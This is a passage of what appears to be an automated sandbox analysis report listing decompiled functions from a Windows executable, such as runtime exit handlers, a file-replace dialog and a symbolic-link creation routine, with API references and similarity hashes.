				return E0041F4E1( *((intOrPtr*)(_t18 - 0x1c)));
			}

0x0041c19a
0x0041c19c
0x0041c1a1
0x0041c1a6
0x0041c1ab
0x0041c1b2
0x0041c1b8
0x0041c1bb
0x0041c1c2
0x0041c1cf

APIs

Part of subcall function 00420AF1: __lock.LIBCMT ref: 00420AF3

__onexit_nolock.LIBCMT ref: 0041C1B2

Part of subcall function 0041C0AF: __decode_pointer.LIBCMT ref: 0041C0BE
Part of subcall function 0041C0AF: __decode_pointer.LIBCMT ref: 0041C0CE
Part of subcall function 0041C0AF: __msize.LIBCMT ref: 0041C0EC
Part of subcall function 0041C0AF: __realloc_crt.LIBCMT ref: 0041C110
Part of subcall function 0041C0AF: __realloc_crt.LIBCMT ref: 0041C126
Part of subcall function 0041C0AF: __encode_pointer.LIBCMT ref: 0041C138
Part of subcall function 0041C0AF: __encode_pointer.LIBCMT ref: 0041C146
Part of subcall function 0041C0AF: __encode_pointer.LIBCMT ref: 0041C151

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: __encode_pointer$__decode_pointer__realloc_crt$__lock__msize__onexit_nolock
String ID:
API String ID: 1316407801-0
Opcode ID: f5055413090f012900e85d2c5431782e1f2a2ad557e6cdea005c92ee7a128a6c
Instruction ID: cab7c56b55a093602c607ea00c3c7e53b14b384329dc7daa783e48f27903ffc6
Opcode Fuzzy Hash: f5055413090f012900e85d2c5431782e1f2a2ad557e6cdea005c92ee7a128a6c
Instruction Fuzzy Hash: 5ED05B30EC1315E6CB10FBA5DC067DD77B06F54314F60415EB114660D3C6BC46814E0C

Uniqueness

Uniqueness Score: -1.00%

Function 0040D238, Relevance: 1.5, APIs: 1, Instructions: 11
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D238(void* __edx, intOrPtr _a20, intOrPtr _a28) {
				void* _t5;

				SendDlgItemMessageW( *0x440cf8, 0x6a, 0x402, E0040CE5E(_a20, _a28), 0); // executed
				_t5 = E0040CD98(); // executed
				return _t5;
			}

0x0040d255
0x0040d25b
0x0040d260

APIs

SendDlgItemMessageW.USER32 ref: 0040D255

Part of subcall function 0040CD98: PeekMessageW.USER32 ref: 0040CDA9
Part of subcall function 0040CD98: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040CDBA
Part of subcall function 0040CD98: TranslateMessage.USER32(?), ref: 0040CDC4
Part of subcall function 0040CD98: DispatchMessageW.USER32 ref: 0040CDCE

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$DispatchItemPeekSendTranslate
String ID:
API String ID: 4142818094-0
Opcode ID: 1cf3b97431e0f9a916b0bcd38e28dc3c1b3da4106feedb5cdb94a95f6c072c7c
Instruction ID: d13643abfd03cc7c0b01c84b829824652077ee8165c1421172272e0a3f3f767c
Opcode Fuzzy Hash: 1cf3b97431e0f9a916b0bcd38e28dc3c1b3da4106feedb5cdb94a95f6c072c7c
Instruction Fuzzy Hash: 48C01234284301EBE7113B10DC46F1A3A26BF91B04F408239BB41740F2CABA4832AA5A

Uniqueness

Uniqueness Score: -1.00%

Function 00420CF5, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00420CF5(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E00420BC9(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}

0x00420cfa
0x00420cfc
0x00420cfe
0x00420d01
0x00420d0a

APIs

_doexit.LIBCMT ref: 00420D01

Part of subcall function 00420BC9: __lock.LIBCMT ref: 00420BD7
Part of subcall function 00420BC9: __decode_pointer.LIBCMT ref: 00420C0E
Part of subcall function 00420BC9: __decode_pointer.LIBCMT ref: 00420C23
Part of subcall function 00420BC9: __decode_pointer.LIBCMT ref: 00420C4D
Part of subcall function 00420BC9: __decode_pointer.LIBCMT ref: 00420C63
Part of subcall function 00420BC9: __decode_pointer.LIBCMT ref: 00420C70
Part of subcall function 00420BC9: __initterm.LIBCMT ref: 00420C9F
Part of subcall function 00420BC9: __initterm.LIBCMT ref: 00420CAF

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: efab0a2ef03aff73e1361c000f78c167e0131b3fecf17a968255fa34d9dec6dc
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: D2B092326802083BEA202582AC07F063E498BC0B68E640021BA1C191A2A9A2B9618089

Uniqueness

Uniqueness Score: -1.00%

Function 004089C3, Relevance: 1.5, APIs: 1, Instructions: 7
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004089C3(void* __ecx) {
				int _t2;

				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
				asm("sbb eax, eax");
				return  ~(_t2 - 1) + 1;
			}

0x004089c6
0x004089cf
0x004089d2

APIs

SetEndOfFile.KERNELBASE(?,00407E0D,?,?,?,?,?,?), ref: 004089C6

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: b9c14ef2187a67f843290a054c2b9e262e036bd7b2bff5e410ac5f577eb86426
Instruction ID: a1a2a515143fa136c0fa1896af93d535fef3f60384e2aff192bd5b7e347d4e26
Opcode Fuzzy Hash: b9c14ef2187a67f843290a054c2b9e262e036bd7b2bff5e410ac5f577eb86426
Instruction Fuzzy Hash: 44B011302E000A8B8E202B30CE088203A20EB2230AB0082B0A802CA0A0CF22C023AA00

Uniqueness

Uniqueness Score: -1.00%

Function 0041972D, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041972D(WCHAR* _a4) {
				signed int _t2;

				_t2 = SetCurrentDirectoryW(_a4); // executed
				asm("sbb eax, eax");
				return  ~( ~_t2);
			}

0x00419731
0x00419739
0x0041973d

APIs

SetCurrentDirectoryW.KERNELBASE(?,0040D5D2,0042A628,00000000,?,00000006,?,00000800), ref: 00419731

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 06aebdbf318cf0655f1523bd7419ced34ae626acb82e8c31ff1b8146a5f04f09
Instruction ID: cac2ccb99042b0a41d046cd8934502c15acad6b75c9ec3e00967a670c8a059f1
Opcode Fuzzy Hash: 06aebdbf318cf0655f1523bd7419ced34ae626acb82e8c31ff1b8146a5f04f09
Instruction Fuzzy Hash: F4A01230294006478A100F30CC09C25B6505760702F0086307042C00A0CB308830A505

Uniqueness

Uniqueness Score: -1.00%

Function 0041E15F, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E15F() {
				void* _t1;

				_t1 = E0041E0ED(0); // executed
				return _t1;
			}

0x0041e161
0x0041e167

APIs

__encode_pointer.LIBCMT ref: 0041E161

Part of subcall function 0041E0ED: TlsGetValue.KERNEL32(00000000,?,0041E166,00000000,004251F5,0044EEB0,00000000,00000314,?,00421302,0044EEB0,Microsoft Visual C++ Runtime Library,00012010), ref: 0041E0FF
Part of subcall function 0041E0ED: TlsGetValue.KERNEL32(00000005,?,0041E166,00000000,004251F5,0044EEB0,00000000,00000314,?,00421302,0044EEB0,Microsoft Visual C++ Runtime Library,00012010), ref: 0041E116
Part of subcall function 0041E0ED: RtlEncodePointer.NTDLL(00000000,?,0041E166,00000000,004251F5,0044EEB0,00000000,00000314,?,00421302,0044EEB0,Microsoft Visual C++ Runtime Library,00012010), ref: 0041E154

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: df08eaee1fca3a784acd882273881f0c4228bd3f88c83d42f354255778d546ed
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040DB4B, Relevance: 52.8, APIs: 27, Strings: 3, Instructions: 291
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040DB4B(void* __ecx, void* __edx, void* __eflags) {
				void* _t71;
				void* _t86;
				int _t87;
				void* _t102;
				signed int _t130;
				void* _t139;
				void* _t150;
				struct HICON__* _t151;
				void* _t155;
				void* _t156;
				void* _t157;
				void* _t158;
				void* _t159;
				void* _t163;
				signed int _t167;
				void* _t169;
				struct HWND__* _t173;
				int _t179;
				void* _t181;
				void* _t183;
				void* _t185;

				_t169 = __edx;
				_t181 = _t183 - 0x68;
				E0041A3E0(0x1a50);
				_t173 =  *(_t181 + 0x70);
				if(E00406056(__edx, _t173,  *(_t181 + 0x74),  *(_t181 + 0x78),  *((intOrPtr*)(_t181 + 0x7c)), L"REPLACEFILEDLG", 0, 0) == 0) {
					_t71 =  *(_t181 + 0x74) - 0x110;
					if(_t71 == 0) {
						SetFocus(GetDlgItem(_t173, 0x6c));
						E0041078F(_t181 - 0x19e8,  *((intOrPtr*)(_t181 + 0x7c)), 0x800);
						E00409FD2(_t181 - 0x19e8, _t181 - 0x19e8, 0x800);
						SetDlgItemTextW(_t173, 0x65, _t181 - 0x19e8);
						SHGetFileInfoW(_t181 - 0x19e8, 0, _t181 - 0x9e8, 0x2b4, 0x100);
						SendDlgItemMessageW( *(_t181 + 0x70), 0x66, 0x170,  *(_t181 - 0x9e8), 0);
						_t86 = FindFirstFileW(_t181 - 0x19e8, _t181 - 0x334);
						 *(_t181 + 0x74) = _t86;
						if(_t86 != 0xffffffff) {
							FileTimeToLocalFileTime(_t181 - 0x320, _t181 + 0x60);
							FileTimeToSystemTime(_t181 + 0x60, _t181 + 0x50);
							GetTimeFormatW(0x400, 2, _t181 + 0x50, 0, _t181 - 0x80, 0x32);
							GetDateFormatW(0x400, 0, _t181 + 0x50, 0, _t181 - 0x1c, 0x32);
							_push(_t181 - 0x80);
							_push(_t181 - 0x1c);
							_t102 = E0040C05C(0x99);
							_t163 = 0x200;
							E0040D452(_t181 - 0x734, 0x200, L"%s %s %s", _t102);
							_t185 = _t183 + 0x18;
							SetDlgItemTextW( *(_t181 + 0x70), 0x6a, _t181 - 0x734);
							FindClose( *(_t181 + 0x74));
							if(( *(_t181 - 0x334) & 0x00000010) == 0) {
								_t139 = E0041A4C0( *((intOrPtr*)(_t181 - 0x318)), 0, 0, 1);
								asm("adc edx, ebx");
								E0040CDD7(_t139 +  *((intOrPtr*)(_t181 - 0x314)), _t169, _t181 - 0xe4, 0x32);
								_push(E0040C05C(0x98));
								_t163 = 0x200;
								E0040D452(_t181 - 0x734, 0x200, L"%s %s", _t181 - 0xe4);
								_t185 = _t185 + 0x14;
								SetDlgItemTextW( *(_t181 + 0x70), 0x68, _t181 - 0x734);
							}
							SendDlgItemMessageW( *(_t181 + 0x70), 0x67, 0x170,  *(_t181 - 0x9e8), 0);
							E00410EF6( *0x440cd8, _t181 + 0x48);
							FileTimeToLocalFileTime(_t181 + 0x48, _t181 + 0x60);
							FileTimeToSystemTime(_t181 + 0x60, _t181 + 0x50);
							GetTimeFormatW(0x400, 2, _t181 + 0x50, 0, _t181 - 0x80, 0x32);
							GetDateFormatW(0x400, 0, _t181 + 0x50, 0, _t181 - 0x1c, 0x32);
							_push(_t181 - 0x80);
							_push(_t181 - 0x1c);
							E0040D452(_t181 - 0x734, _t163, L"%s %s %s", E0040C05C(0x99));
							SetDlgItemTextW( *(_t181 + 0x70), 0x6b, _t181 - 0x734);
							_t130 =  *0x440ce4;
							_t167 =  *0x440ce0;
							if(( *(_t181 - 0x334) & 0x00000010) == 0 || (_t167 | _t130) != 0) {
								E0040CDD7(_t167, _t130, _t181 - 0xe4, 0x32);
								_push(E0040C05C(0x98));
								E0040D452(_t181 - 0x734, _t163, L"%s %s", _t181 - 0xe4);
								SetDlgItemTextW( *(_t181 + 0x70), 0x69, _t181 - 0x734);
							}
						}
						L26:
						_t87 = 0;
						L27:
						goto L28;
					}
					if(_t71 != 1) {
						goto L26;
					}
					_t179 = 2;
					_t150 = ( *(_t181 + 0x78) & 0x0000ffff) - _t179;
					if(_t150 == 0) {
						L11:
						_push(6);
						L12:
						_pop(_t179);
						L13:
						_t151 = SendDlgItemMessageW(_t173, 0x66, 0x171, 0, 0);
						if(_t151 != 0) {
							DestroyIcon(_t151);
						}
						EndDialog(_t173, _t179);
						_t87 = 1;
						goto L27;
					}
					_t155 = _t150 - 0x6a;
					if(_t155 == 0) {
						_t179 = 0;
						goto L13;
					}
					_t156 = _t155 - 1;
					if(_t156 == 0) {
						_t179 = 1;
						goto L13;
					}
					_t157 = _t156 - 1;
					if(_t157 == 0) {
						_push(4);
						goto L12;
					}
					_t158 = _t157 - 1;
					if(_t158 == 0) {
						goto L13;
					}
					_t159 = _t158 - 1;
					if(_t159 == 0) {
						_push(3);
						goto L12;
					}
					if(_t159 != 1) {
						goto L26;
					}
					goto L11;
				} else {
					_t87 = 1;
					L28:
					return _t87;
				}
			}

0x0040db4b
0x0040db4c
0x0040db55
0x0040db5c
0x0040db79
0x0040db86
0x0040db8c
0x0040dc01
0x0040dc17
0x0040dc25
0x0040dc3a
0x0040dc55
0x0040dc6c
0x0040dc80
0x0040dc86
0x0040dc8c
0x0040dc9d
0x0040dcab
0x0040dcc4
0x0040dcd7
0x0040dce0
0x0040dce4
0x0040dcea
0x0040dcf5
0x0040dd02
0x0040dd07
0x0040dd16
0x0040dd1b
0x0040dd28
0x0040dd3f
0x0040dd4e
0x0040dd52
0x0040dd61
0x0040dd6e
0x0040dd7b
0x0040dd80
0x0040dd8f
0x0040dd8f
0x0040dda3
0x0040ddb3
0x0040ddc0
0x0040ddce
0x0040dde3
0x0040ddf8
0x0040de01
0x0040de05
0x0040de1e
0x0040de32
0x0040de3b
0x0040de40
0x0040de46
0x0040de59
0x0040de68
0x0040de7d
0x0040de91
0x0040de91
0x0040de46
0x0040de93
0x0040de93
0x0040de95
0x00000000
0x0040de95
0x0040db8f
0x00000000
0x00000000
0x0040db9b
0x0040db9c
0x0040db9e
0x0040dbb8
0x0040dbb8
0x0040dbba
0x0040dbba
0x0040dbbb
0x0040dbc5
0x0040dbcd
0x0040dbd0
0x0040dbd0
0x0040dbd8
0x0040dbe0
0x00000000
0x0040dbe0
0x0040dba0
0x0040dba3
0x0040dbf3
0x00000000
0x0040dbf3
0x0040dba5
0x0040dba6
0x0040dbf0
0x00000000
0x0040dbf0
0x0040dba8
0x0040dba9
0x0040dbea
0x00000000
0x0040dbea
0x0040dbab
0x0040dbac
0x00000000
0x00000000
0x0040dbae
0x0040dbaf
0x0040dbe6
0x00000000
0x0040dbe6
0x0040dbb2
0x00000000
0x00000000
0x00000000
0x0040db7b
0x0040db7d
0x0040de98
0x0040de9c
0x0040de9c

APIs

SendDlgItemMessageW.USER32 ref: 0040DBC5
DestroyIcon.USER32(00000000), ref: 0040DBD0
EndDialog.USER32(?,00000006), ref: 0040DBD8

Strings

REPLACEFILEDLG, xrefs: 0040DB63
%s %s %s, xrefs: 0040DCF0, 0040DE11
%s %s, xrefs: 0040DD69, 0040DE70

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: DestroyDialogIconItemMessageSend
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 3309745630-1840816070
Opcode ID: 561d2a46207b4ddb3983e1c0a4342bfabda725d3e2088c7ec03d68bb51d1c9e9
Instruction ID: f301624ae4010f19fbb5f247ec05814bab4fb22fca9621d8caf1453b9e0b300b
Opcode Fuzzy Hash: 561d2a46207b4ddb3983e1c0a4342bfabda725d3e2088c7ec03d68bb51d1c9e9
Instruction Fuzzy Hash: 0AA18271A4020CBBEB21AFE0CC85FEF776CEB04704F400476BA05E61D1D679AA55CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004066FE, Relevance: 38.8, APIs: 17, Strings: 5, Instructions: 274
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004066FE(void* __ebx, void* __ecx, void* __esi) {
				void* __edi;
				signed int _t99;
				signed int _t108;
				intOrPtr _t109;
				intOrPtr _t112;
				int _t136;
				long _t152;
				long _t156;
				void* _t175;
				short _t176;
				void* _t178;
				void* _t182;
				void* _t185;
				intOrPtr _t186;
				long _t187;
				short _t190;
				void* _t192;
				intOrPtr _t194;
				signed int _t195;
				signed int _t210;
				void* _t211;
				signed int _t212;
				void* _t214;
				void* _t217;
				void* _t219;
				void* _t220;

				_t214 = __esi;
				_t192 = __ecx;
				_t182 = __ebx;
				E00419DD4(E0042916F, _t217);
				E0041A3E0(0x303c);
				if( *0x432a62 == 0) {
					E0040647C(L"SeRestorePrivilege");
					E0040647C(L"SeCreateSymbolicLinkPrivilege");
					 *0x432a62 = 1;
				}
				_push(_t211);
				E004090CB(_t182, _t192, _t211,  *(_t217 + 0xc), 1);
				_t212 =  *(_t217 + 0x10);
				if( *((char*)(_t212 + 0x10e1)) != 0 ||  *((char*)(_t212 + 0x20f4)) != 0) {
					_t99 = CreateDirectoryW( *(_t217 + 0xc), 0);
					__eflags = _t99;
					if(_t99 != 0) {
						goto L6;
					}
					goto L10;
				} else {
					_t178 = CreateFileW( *(_t217 + 0xc), 0x40000000, 0, 0, 1, 0x80, 0);
					if(_t178 == 0xffffffff) {
						L10:
						_t152 = 0;
						L24:
						 *[fs:0x0] =  *((intOrPtr*)(_t217 - 0xc));
						return _t152;
					}
					CloseHandle(_t178);
					L6:
					_push(_t182);
					_push(_t214);
					E00401306(_t217 - 0x20, 0x1418);
					 *(_t217 - 4) =  *(_t217 - 4) & 0x00000000;
					E0041078F(_t217 - 0x1024, _t212 + 0x10f4, 0x800);
					 *(_t217 + 0x10) = E0041A0A7(_t217 - 0x1024);
					_t215 = _t217 - 0x1024;
					 *((intOrPtr*)(_t217 - 0x10)) = _t217 - 0x2024;
					_t108 = E0041C28A(_t217 - 0x1024, L"\\??\\", 4);
					_t220 = _t219 + 0x10;
					asm("sbb bl, bl");
					_t185 =  ~_t108 + 1;
					if(_t185 == 0) {
						L11:
						_t109 =  *((intOrPtr*)(_t217 - 0x10));
						L12:
						E0041A0EF(_t109, _t215);
						_t112 = E0041A0A7(_t217 - 0x2024);
						_t194 =  *((intOrPtr*)(_t212 + 0x10f0));
						 *((intOrPtr*)(_t217 - 0x10)) = _t112;
						if(_t194 != 3) {
							__eflags = _t194 - 2;
							if(_t194 == 2) {
								L18:
								_t195 =  *(_t217 + 0x10);
								_t215 =  *(_t217 - 0x20);
								 *(_t215 + 4) = _t112 + _t195 + _t112 + _t195 + 0x10;
								 *((short*)(_t215 + 6)) = 0;
								 *((short*)(_t215 + 8)) = 0;
								 *((short*)(_t215 + 0xa)) = _t195 + _t195;
								 *_t215 = 0xa000000c;
								E0041A0EF(_t215 + 0x14, _t217 - 0x1024);
								 *((short*)(_t215 + 0xc)) =  *(_t217 + 0x10) +  *(_t217 + 0x10) + 2;
								 *((short*)(_t215 + 0xe)) =  *((intOrPtr*)(_t217 - 0x10)) +  *((intOrPtr*)(_t217 - 0x10));
								E0041A0EF(_t215 + 0x16 +  *(_t217 + 0x10) * 2, _t217 - 0x2024);
								__eflags = _t185;
								_t67 = _t185 == 0;
								__eflags = _t67;
								 *(_t215 + 0x10) = 0 | _t67;
								L19:
								_t185 = CreateFileW( *(_t217 + 0xc), 0xc0000000, 0, 0, 3, 0x2200000, 0);
								_t232 = _t185 - 0xffffffff;
								if(_t185 != 0xffffffff) {
									_t136 = DeviceIoControl(_t185, 0x900a4, _t215, ( *(_t215 + 4) & 0x0000ffff) + 8, 0, 0, _t217 - 0x24, 0);
									__eflags = _t136;
									if(_t136 != 0) {
										E00408533(_t217 - 0x3048);
										 *(_t217 - 4) = 1;
										E004087BE(_t217 - 0x3048);
										 *(_t217 - 0x3044) = _t185;
										_t186 =  *((intOrPtr*)(_t217 + 8));
										asm("sbb eax, eax");
										asm("sbb eax, eax");
										asm("sbb eax, eax");
										E00408AB6(_t217 - 0x3048,  ~( *(_t186 + 0x628c)) & _t212 + 0x00001030,  ~( *(_t186 + 0x6290)) & _t212 + 0x00001038,  ~( *(_t186 + 0x6294)) & _t212 + 0x00001040);
										E004087BE(_t217 - 0x3048);
										__eflags =  *((char*)(_t186 + 0x519b));
										if( *((char*)(_t186 + 0x519b)) == 0) {
											E00408E0E( *(_t217 + 0xc),  *((intOrPtr*)(_t212 + 0x1c)));
										}
										 *(_t217 - 4) = 0;
										E004089F9(_t186, _t217 - 0x3048);
										_t187 = 1;
										L32:
										_push(_t215);
										E00419DFE(_t187, _t212, _t215, __eflags);
										_t152 = _t187;
										L23:
										goto L24;
									}
									CloseHandle(_t185);
									E004062C8(0x14, 0,  *(_t217 + 0xc));
									_t156 = GetLastError();
									__eflags = _t156 - 0x522;
									if(_t156 == 0x522) {
										_t156 = E00401B9F(0x16);
									}
									E00422FB3(_t156);
									E00406222(0x432a6c, 9);
									__eflags =  *((char*)(_t212 + 0x10e1));
									_push( *(_t217 + 0xc));
									if( *((char*)(_t212 + 0x10e1)) == 0) {
										DeleteFileW();
									} else {
										RemoveDirectoryW();
									}
									_t187 = 0;
									__eflags = 0;
									goto L32;
								}
								_push(_t215);
								L21:
								E00419DFE(_t185, _t212, _t215, _t232);
								L22:
								_t152 = 0;
								goto L23;
							}
							__eflags = _t194 - 1;
							if(_t194 == 1) {
								goto L18;
							}
							__eflags =  *(_t217 - 0x20);
							if(__eflags == 0) {
								goto L22;
							}
							_push( *(_t217 - 0x20));
							goto L21;
						}
						_t210 =  *(_t217 + 0x10);
						_t215 =  *(_t217 - 0x20);
						 *(_t215 + 4) = _t112 + _t210 + _t112 + _t210 + 0xc;
						 *((short*)(_t215 + 6)) = 0;
						 *((short*)(_t215 + 8)) = 0;
						_t190 = _t210 + _t210;
						 *_t215 = 0xa0000003;
						 *((short*)(_t215 + 0xa)) = _t190;
						E0041A0EF(_t215 + 0x10, _t217 - 0x1024);
						 *((short*)(_t215 + 0xe)) =  *((intOrPtr*)(_t217 - 0x10)) +  *((intOrPtr*)(_t217 - 0x10));
						 *((short*)(_t215 + 0xc)) = _t190 + 2;
						E0041A0EF(_t215 + 0x12 +  *(_t217 + 0x10) * 2, _t217 - 0x2024);
						goto L19;
					}
					_t215 = _t217 - 0x101c;
					_t175 = E0041C28A(_t217 - 0x101c, L"UNC\\", 4);
					_t220 = _t220 + 0xc;
					if(_t175 != 0) {
						goto L11;
					}
					_t176 = 0x5c;
					 *((short*)(_t217 - 0x2024)) = _t176;
					_t109 = _t217 - 0x2022;
					_t215 = _t217 - 0x1016;
					goto L12;
				}
			}

0x004066fe
0x004066fe
0x004066fe
0x00406703
0x0040670d
0x00406719
0x00406720
0x0040672a
0x0040672f
0x0040672f
0x00406736
0x0040673c
0x00406741
0x0040674b
0x00406826
0x0040682c
0x0040682e
0x00000000
0x00000000
0x00000000
0x0040675e
0x00406772
0x0040677b
0x00406834
0x00406834
0x0040697a
0x0040697e
0x00406986
0x00406986
0x00406782
0x00406788
0x00406788
0x00406789
0x00406792
0x00406797
0x004067ae
0x004067bf
0x004067ca
0x004067d0
0x004067db
0x004067e0
0x004067e7
0x004067e9
0x004067eb
0x0040683b
0x0040683b
0x0040683e
0x00406840
0x0040684c
0x00406851
0x0040685a
0x00406860
0x004068c5
0x004068c8
0x004068e1
0x004068e1
0x004068e4
0x004068ed
0x004068f3
0x004068f7
0x004068fe
0x0040690d
0x00406913
0x00406920
0x00406929
0x0040693c
0x00406946
0x00406948
0x00406948
0x0040694b
0x0040694e
0x00406968
0x0040696a
0x0040696d
0x004069a1
0x004069a7
0x004069a9
0x00406a17
0x00406a22
0x00406a26
0x00406a2b
0x00406a31
0x00406a3c
0x00406a4f
0x00406a68
0x00406a73
0x00406a7e
0x00406a83
0x00406a8a
0x00406a92
0x00406a92
0x00406a9d
0x00406aa1
0x00406aa6
0x00406a03
0x00406a03
0x00406a04
0x00406a0a
0x00406978
0x00000000
0x00406979
0x004069ac
0x004069b9
0x004069be
0x004069c4
0x004069c9
0x004069cd
0x004069cd
0x004069d9
0x004069e2
0x004069e7
0x004069ee
0x004069f1
0x004069fb
0x004069f3
0x004069f3
0x004069f3
0x00406a01
0x00406a01
0x00000000
0x00406a01
0x0040696f
0x00406970
0x00406970
0x00406976
0x00406976
0x00000000
0x00406976
0x004068ca
0x004068cd
0x00000000
0x00000000
0x004068cf
0x004068d3
0x00000000
0x00000000
0x004068d9
0x00000000
0x004068d9
0x00406862
0x00406865
0x0040686e
0x00406874
0x00406878
0x00406886
0x0040688a
0x00406890
0x00406894
0x0040689e
0x004068b4
0x004068b8
0x00000000
0x004068bd
0x004067ef
0x004067fd
0x00406802
0x00406807
0x00000000
0x00000000
0x0040680b
0x0040680c
0x00406813
0x00406819
0x00000000
0x00406819

APIs

__EH_prolog.LIBCMT ref: 00406703
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000), ref: 00406772
CloseHandle.KERNEL32(00000000), ref: 00406782
_wcslen.LIBCMT ref: 004067BA
CreateDirectoryW.KERNEL32(?,00000000), ref: 00406826
_wcscpy.LIBCMT ref: 00406840
_wcslen.LIBCMT ref: 0040684C
_wcscpy.LIBCMT ref: 00406894

Part of subcall function 0040647C: GetCurrentProcess.KERNEL32(00000020,?), ref: 0040648B
Part of subcall function 0040647C: OpenProcessToken.ADVAPI32(00000000), ref: 00406492
Part of subcall function 0040647C: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004064B2
Part of subcall function 0040647C: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 004064C7
Part of subcall function 0040647C: GetLastError.KERNEL32 ref: 004064D1
Part of subcall function 0040647C: CloseHandle.KERNEL32(?), ref: 004064E0

_wcscpy.LIBCMT ref: 004068B8
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00406962
DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 004069A1
CloseHandle.KERNEL32(00000000), ref: 004069AC
GetLastError.KERNEL32 ref: 004069BE
